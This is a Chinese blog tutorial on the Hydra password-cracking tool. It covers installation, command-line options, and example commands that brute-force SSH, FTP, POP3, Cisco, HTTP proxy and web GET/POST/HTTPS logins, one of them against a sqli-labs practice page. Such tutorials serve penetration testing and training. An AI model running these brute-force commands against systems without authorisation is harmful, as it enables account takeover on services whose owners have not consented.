hydra基本使用

发布于 2022-01-07  2203 次阅读


1.hydra简介

hydra是一款万能爆破工具,成功与否取决于字典,可以爆破AFP, Cisco AAA, Cisco auth, Cisco enable, CVS, Firebird, FTP, HTTP-FORM-GET, HTTP-FORM-POST, HTTP-GET, HTTP-HEAD, HTTP-PROXY, HTTPS-FORM-GET, HTTPS-FORM-POST, HTTPS-GET, HTTPS-HEAD, HTTP-Proxy, ICQ, IMAP, IRC, LDAP, MS-SQL, MYSQL, NCP, NNTP, Oracle Listener, Oracle SID, Oracle, PC-Anywhere, PCNFS, POP3, POSTGRES, RDP, Rexec, Rlogin, Rsh, SAP/R3, SIP, SMB, SMTP, SMTP Enum, SNMP, SOCKS5, SSH (v1 and v2), Subversion, Teamspeak (TS2), Telnet, VMware-Auth, VNC and XMPP等类型密码。

2.安装

如果是Debian和Ubuntu发行版,源里自带hydra,直接用apt-get在线安装:
sudo apt-get install libssl-dev libssh-dev libidn11-dev libpcre3-dev libgtk2.0-dev libmysqlclient-dev libpq-dev libsvn-dev firebird2.1-dev libncp-dev hydra
Redhat/Fedora发行版的下载源码包编译安装,先安装相关依赖包:
yum install openssl-devel pcre-devel ncpfs-devel postgresql-devel libssh-devel subversion-devel
hydra下载地址:http://www.thc.org/releases/hydra-7.3.tar.gz
# tar zxvf hydra-7.0-src.tar.gz
# cd hydra-7.0-src
# ./configure
# make
# make install

3.参数

hydra <ip> <服务>

可选

  1. -l  #指定用户名
  2. -L #指定用户名字典
  3. -p #指定密码
  4. -P #指定密码文件路径
  5. -t  #指定线程默认16
  6. -e ns #n:空密码试探,s:使用指定用户和密码试探
  7. -f  #找到第一对登录名或者密码的时候中止破解
  8. -o  #指定结果输出到的文件
  9. -s   #指定端口
  10. -R #继续从上一次进度接着破解
  11. -S  #采用SSL链接
  12. -w  #最大超时时间,默认30秒
  13. -v/-V   #显示详细过程

<必选>

  1. ip  #目标ip
  2. server #指定服务名,支持的服务和协议:telnet ftp pop3[-ntlm] imap[-ntlm] smb smbnt http[s]-{head|get} http-{get|post}-form http-proxy cisco cisco-enable vnc ldap2 ldap3 mssql mysql oracle-listener postgres nntp socks5 rexec rlogin pcnfs snmp rsh cvs svn icq sapr3 ssh2 smtp-auth[-ntlm] pcanywhere teamspeak sip vmauthd firebird ncp afp

4.案例

hydra -l root -t 64 -P /usr/share/john/password.lst 4.4.7.100 ssh

  • 爆破web登录(GET)
    hydra -l 用户名 -p 密码字典 -t 线程 -vV -e ns ip http-get/admin/
  • 爆破web登录(POST)
    hydra -l admin -P /usr/share/john/password.lst -s 端口 目标ip  http-post-form "/Less-11/index.php:uname=^USER^&passwd=^PASS^&submit=Submit:slap.jpg"
    http-post-form  ""#申明post表单
    /Less-11/index.php:username=^USER^&password=^PASS^:slap.jpg  #ip地址后面跟的路径:post提交的东西:失败时返回的源码文字。
    &submit=Submit:S="Password:1"" #S=""成功时源码上的字,不要出现:这个,否则会报错。
  • 爆破https
    hydra -m /index.php -l admin -P pass.txt ip https
  • 爆破ssh
    hydra -l 用户名 -p 密码字典 -t 线程 -vV -e ns ip ssh
  • 爆破ftp
    hydra ip ftp -l 用户名 -P 密码字典 -t 线程(默认16) –vV
  • 爆破pop3
    hydra -l admin -P pass.txt my.pop3.mail pop3
  • 爆破cisco
    hydra -m cloud -P pass.txt 10.36.16.18 cisco-enable
  • http-porxy
    hydra -l admin -P pass.txt http-proxy://ip
  • 后面的都是同理不列举了!
子夜不哭
最后更新于 2022-01-07